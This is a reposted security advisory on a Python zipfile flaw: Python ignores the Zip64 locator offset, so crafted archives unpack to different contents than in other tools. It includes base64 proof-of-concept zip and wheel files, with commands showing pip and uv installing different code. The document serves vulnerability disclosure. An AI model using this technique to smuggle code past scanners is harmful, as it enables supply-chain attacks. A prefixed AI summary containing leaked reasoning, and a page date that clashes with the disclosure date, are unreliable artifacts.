Python - Zip64 Locator Offset Vulnerability
嗯,用户让我帮忙总结一下这篇文章的内容,控制在100个字以内,而且不需要用“文章内容总结”之类的开头。首先,我得仔细阅读这篇文章,理解它的主要观点。 文章讲的是Python的zipfile模块在处理某些特定构造的zip文件时,会返回与其它常见zip实现不同的内容。这是因为Python忽略了Zip64定位器记录中的偏移量,而是期望Zip64中央目录结束记录紧接在定位器记录之前,并完全忽略偏移量。这可能导致存在两个Zip64中央目录结束记录,一个由定位器记录的偏移量指向,另一个位于定位器记录之前。 攻击需要用户交互,并且需要在处理zip文件的不同阶段使用不同的解析实现。例如,Python Wheel文件和“uv”可能被利用。漏洞的严重性是中等,可以用来隐藏恶意内容以逃避检测。 文章还提供了一个简单的POC zip文件和一个wheel文件的例子,展示了如何利用这个漏洞。进一步分析显示,Python的实现与大多数其他实现不同,因为它不使用定位器记录中的偏移量,并且没有验证假设是否正确。 时间线显示漏洞报告日期是2025年7月28日,修复日期未定,披露日期是2026年10月27日。 现在我需要将这些要点浓缩到100字以内。重点包括:Python zipfile模块处理特定zip文件时的行为差异、利用条件、漏洞影响、POC示例以及与其它实现的不同之处。 总结起来:文章描述了Python的zipfile模块在处理特定构造的Zip64格式zip文件时的行为差异。攻击者可利用此差异隐藏恶意内容或在不同环境中呈现不同结果。该漏洞影响中等,并提供了一个概念验证示例。 </think> 文章描述了Python的zipfile模块在处理特定构造的Zip64格式zip文件时的行为差异。攻击者可利用此差异隐藏恶意内容或在不同环境中呈现不同结果。该漏洞影响中等,并提供了一个概念验证示例。 2025-10-26 23:58:58 Author: github.com(查看原文) 阅读量:0 收藏

Summary

It is possible to craft a zip file that, when parsed by Python's zipfile implementation, returns contents that are different from other common zip implementations. This is achieved because Python ignores the offset in the Zip64 locator record. Instead Python's implementation expects to see the Zip64 end-of-central-directory record immediately prior to the Zip64 locator record, and ignores the offset entirely. This means two Zip64 end-of-central-directory records can be present. One that is pointed to by the offset in the Zip64 locator record, and the other that sits prior to the Zip64 locator record.

In order for this to be exploitable, user interaction is required. An attack using this technique would require different zip parsing implementations to be used at different times during the handling of the zip file. For example, Python Wheel files and "uv".

Severity

Moderate - This vulnerability can be leveraged to hide malicious content that evades detection.

Proof of Concept

Single File Zip

The following base64 encoded string is a specially crafted zip file that serves as a simple proof-of-concept.

$ echo "UEsDBBQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAYm9yaW5nX2ZpbGVub3QgcHl0aG9uClBLAQIUAxQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAAAAAAAAAAAC0AQAAAABib3JpbmdfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA5AAAAAAAAADQAAAAAAAAAUEsDBBQAAAAAAAAAIQBh7IWUCgAAAAoAAAAHAAAAcHlfZmlsZWlzIHB5dGhvbgpQSwECFAMUAAAAAAAAACEAYeyFlAoAAAAKAAAABwAAAAAAAAAAAAAAtAGlAAAAcHlfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA1AAAAAAAAANQAAAAAAAAAUEsGBwAAAABtAAAAAAAAAAEAAABQSwUGAAAAAAEAAQA5AAAANAAAAAAA" | base64 -d > poc.zip

When unzipped in Python a file called py_file with the contents "is python" will be returned.

When unzipped with other zip implementations, a file called boring_file with the contents "not python" will be returned.

Extracting with Python:

$ mkdir ~/py && cd ~/py
$ python3 -c "import zipfile; zipfile.ZipFile('../poc.zip').extractall()"
$ ls
py_file
$ cat py_file
is python

Extracting with unzip (InfoZip):

$ mkdir ~/unzip && cd ~/unzip
$ unzip ../poc.zip
Archive:  ../poc.zip
 extracting: boring_file             
$ cat boring_file
not python

Implementations that output boring_file include:

  • Go
  • java.util.zip (seek and streaming)
  • InfoZip (unzip)
  • MiniZip (zlib)
  • PHP
  • zip + async_zip Rust crates (seek and streaming)
  • Yauzl (npm)
  • net.lingala.zip4j (Maven)
  • libarchive (bsdunzip)

Wheel

The following base64 encoded string is a specially crafted wheel file, that further demonstrates the flaw and a potential attack scenario.

$ echo "UEsDBBQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQU1ldGFkYXRhLVZlcnNpb246IDIuNApOYW1lOiBjYndoZWVsemlwNjQKVmVyc2lvbjogMC4wLjEKU3VtbWFyeTogTW9yZSBteXN0ZXJpZXMKQXV0aG9yLWVtYWlsOiBDYWxlYiA8Y2FsZWJicm93bkBnb29nbGUuY29tPgpQSwMEFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMV2hlZWwtVmVyc2lvbjogMS4wCkdlbmVyYXRvcjogZmxpdCAzLjEyLjAKUm9vdC1Jcy1QdXJlbGliOiB0cnVlClRhZzogcHkyLW5vbmUtYW55ClRhZzogcHkzLW5vbmUtYW55ClBLAwQUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEY2J3aGVlbHppcDY0L19faW5pdF9fLnB5LHNoYTI1Nj01NTU0ZWNiZTNmOTYyMjk4Mzc3NDE1NzdhZTJkMmYyODVmMTUwOTYxOThmYWViZGFhYTFmNDVmMTlkMzQ5YjQwLDIxCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUwsc2hhMjU2PTBmMmI3YTQ4MTdkYTZhYzU4NDk1NGFkNDQ2NDkyNzU0NTAxOTBjNzQ5M2MzMTgzNzNkYTRmMzZiYjQ1MjZlNDYsMTAwCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vTUVUQURBVEEsc2hhMjU2PTkwNDc2ZGUxNDFiYzc4NzA0YjQzY2I4NjBhNDIzYTFmYTA0ZmU1NTc1ODQ3MjZhNzUxMWQyYTk0MTkyYzlmOTMsMTI0CmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JELCwwMDAzNjhQSwMEFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAABjYndoZWVsemlwNjQvX19pbml0X18ucHlwcmludCgibWFnaWMiKQojINaEk5lQSwECFAMUAAAAAAAAACEAIuTe7nwAAAB8AAAAJQAAAAAAAAAAAAAAtAEAAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQVBLAQIUAxQAAAAAAAAAIQDdQF59ZAAAAGQAAAAiAAAAAAAAAAAAAAC0Ab8AAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMUEsBAhQDFAAAAAAAAAAhAFy+oORwAQAAcAEAACMAAAAAAAAAAAAAALQBYwEAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEUEsBAhQDFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAAAAAAAAAAAAALQBFAMAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weVBLBgaaAwAAAAAAAC0ALQAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAA6AQAAAAAAAF8DAAAAAAAAUEsDBBQAAAAAAAAAIQBcvqDkcAEAAHABAAAjAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRjYndoZWVsemlwNjQvX19pbml0X18ucHksc2hhMjU2PTAxZjBhMDZjOTUxNTMyNGMxYzcwYmQ0YjQ3Yjg1NWRkNWRmMzg4ZTBlNmU4OWNlZDg4OGY2ODFmNGU3NTY3ZWYsMjEKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9XSEVFTCxzaGEyNTY9MGYyYjdhNDgxN2RhNmFjNTg0OTU0YWQ0NDY0OTI3NTQ1MDE5MGM3NDkzYzMxODM3M2RhNGYzNmJiNDUyNmU0NiwxMDAKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQSxzaGEyNTY9OTA0NzZkZTE0MWJjNzg3MDRiNDNjYjg2MGE0MjNhMWZhMDRmZTU1NzU4NDcyNmE3NTExZDJhOTQxOTJjOWY5MywxMjQKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkQsLDAwaRpgClBLAwQUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weXByaW50KCJtb3JlIG1hZ2ljISIpClBLAQIUAxQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAAAAAAAAAAAC0AQAAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL01FVEFEQVRBUEsBAhQDFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAAAAAAAAAAAAALQBvwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUxQSwECFAMUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAAAAAAAAAAAAtAHRBAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRQSwECFAMUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAAAAAAAAAAAAtAGCBgAAY2J3aGVlbHppcDY0L19faW5pdF9fLnB5UEsGBiwAAAAAAAAALQAtAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAADoBAAAAAAAAzQYAAAAAAABQSwYHAAAAAJkEAAAAAAAAAQAAAFBLBQYAAAAABAAEADoBAABfAwAAAAA=" | base64 -d > cbwheelzip64-0.0.1-py2.py3-none-any.whl

Installing with uv:

$ mkdir uv && cd uv
$ uv venv env
$ . env/bin/activate
$ uv pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl 
Using Python 3.12.3 environment at: env
Resolved 1 package in 3ms
Installed 1 package in 1ms
 + cbwheelzip64==0.0.1 (from file:///home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl)

$ python3 -c 'import cbwheelzip64'
magic

installing with pip:

$ mkdir py && cd py
$ python3 -m venv env
$ . env/bin/activate
$ pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Processing /home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing collected packages: cbwheelzip64
Successfully installed cbwheelzip64-0.0.1

$ python3 -c 'import cbwheelzip64'
more magic!

Further Analysis

# cpython/Lib/zipfile/__init__.py @ 6bf1c0ab3497b1b193812654bcdfd0c11b4192d8

# Simplified implementation, removing conditions and error handling.

def _EndRecData64(fpin, offset, endrec):
    fpin.seek(offset - sizeEndCentDir64Locator, 2)
    data = fpin.read(sizeEndCentDir64Locator)

    sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)

    # Assume no 'zip64 extensible data'
    fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
    data = fpin.read(sizeEndCentDir64)
    # ...

The above code snippet is the current logic used to read the zip64 end-of-central-directory record.

sizeEndCentDir64Locator and sizeEndCentDir64 are both constants derived from the struct.calcsize on import.

When reading the zip64 end-of-central-directory the zip64 locator record (reloff) is ignored entirely, and instead the offset is calculated from the record size constants.

The comment "Assume no 'zip64 extensible data'" seems to suggest this "fixed offset" behaviour is intentional, as reading the "zip64 extensible data" field would require treating the zip64 end-of-central-directory record as having a variable size.

However by making this assumption, Python's zip implementation now differs from the majority of other implementations, which do use the offset from the zip64 locator record.

Finally, the assumption of no extensible data is not validated. reloff is not checked to ensure that it corresponds to the position of the zip64 end-of-central-directory record that is actually read. This means that reloff can point to a separate zip64 end-of-central-directory record that returns different content to the one read by Python.

Timeline

Date reported: 07/28/2025
Date fixed:
Date disclosed: 10/27/2026


文章来源: https://github.com/google/security-research/security/advisories/GHSA-hhv7-p4pg-wm6p
如有侵权请联系:admin#unsafe.sh